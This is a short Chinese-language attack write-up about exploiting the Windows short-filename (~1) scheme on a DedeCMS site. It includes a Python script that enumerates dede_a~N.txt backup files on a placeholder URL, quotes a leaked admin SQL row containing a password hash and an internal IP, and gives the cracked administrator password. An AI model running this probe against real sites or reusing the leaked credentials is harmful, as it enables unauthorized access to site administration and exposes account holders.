根据短文件名的漏洞利用方式:
只有前六位字符直接显示,后续字符用~1指代。其中数字1还可以递增,如果存在多个文件名类似的文件(名称前6位必须相同,且后缀名前3位必须相同)。后缀名最长只有3位,多余的被截断。
Python简单检查漏洞脚本
import requests
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"}
url='http://www.url.com'
exp='/data/backupdata/dede_a~'
for i in range(10):
urls = url + exp + str(i) + '.txt'
res = requests.get(urls,headers=headers,timeout=4)
code = res.status_code
if code == 200:
print('存在-->' + urls)
可以找到3条记录
INSERT INTO `dede_admin` VALUES('1','10','admin','c45fb146c78333b663a3','admin','','','','1578348516','172.16.2.221');在dede_a~2.txt这条发现了管理员账号密码
解密后密码为sz19950721